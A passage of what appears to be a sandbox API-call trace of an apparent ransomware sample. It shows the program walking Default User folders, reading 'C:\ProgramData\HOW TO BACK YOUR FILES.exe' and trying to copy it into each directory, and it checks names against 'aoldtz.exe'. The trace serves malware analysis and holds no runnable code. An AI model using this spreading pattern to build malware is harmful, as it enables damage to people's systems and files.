dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.711] GetLastError () returned 0x0 [0065.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.711] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.711] CloseHandle (hObject=0x120) returned 1 [0065.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.711] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.712] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.712] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.712] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.712] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0065.712] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned 96 [0065.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.712] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.712] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.713] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.713] GetLastError () returned 0x0 [0065.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.713] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.713] CloseHandle (hObject=0x120) returned 1 [0065.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.713] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.713] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.713] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.713] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.713] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0065.713] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned 104 [0065.713] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.713] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.713] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.714] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.714] GetLastError () returned 0x0 [0065.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.714] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.714] CloseHandle (hObject=0x120) returned 1 [0065.714] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.714] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.714] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.714] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.715] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.715] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3192e8 | out: hHeap=0x2b0000) returned 1 [0065.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0065.715] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned 94 [0065.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.715] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.715] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.715] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.715] GetLastError () returned 0x0 [0065.715] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.716] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.716] CloseHandle (hObject=0x120) returned 1 [0065.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.716] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.716] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.716] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.716] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.716] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0065.716] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned 99 [0065.716] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.716] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.717] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.717] GetLastError () returned 0x0 [0065.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.717] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.717] CloseHandle (hObject=0x120) returned 1 [0065.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.717] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.717] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.717] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.718] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319220 | out: hHeap=0x2b0000) returned 1 [0065.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.718] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned 93 [0065.718] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.718] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.718] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.718] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.718] GetLastError () returned 0x0 [0065.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.718] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.719] CloseHandle (hObject=0x120) returned 1 [0065.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.719] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.719] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.719] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.719] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.719] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0065.719] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned 104 [0065.719] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.719] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.719] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.720] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.720] GetLastError () returned 0x0 [0065.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.720] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.720] CloseHandle (hObject=0x120) returned 1 [0065.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.720] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.720] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.720] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.720] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.720] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0065.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.721] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned 100 [0065.721] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.721] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.721] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.721] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.721] GetLastError () returned 0x0 [0065.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.721] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.721] CloseHandle (hObject=0x120) returned 1 [0065.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.721] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.722] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.722] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.722] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.722] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.722] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned 104 [0065.722] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR 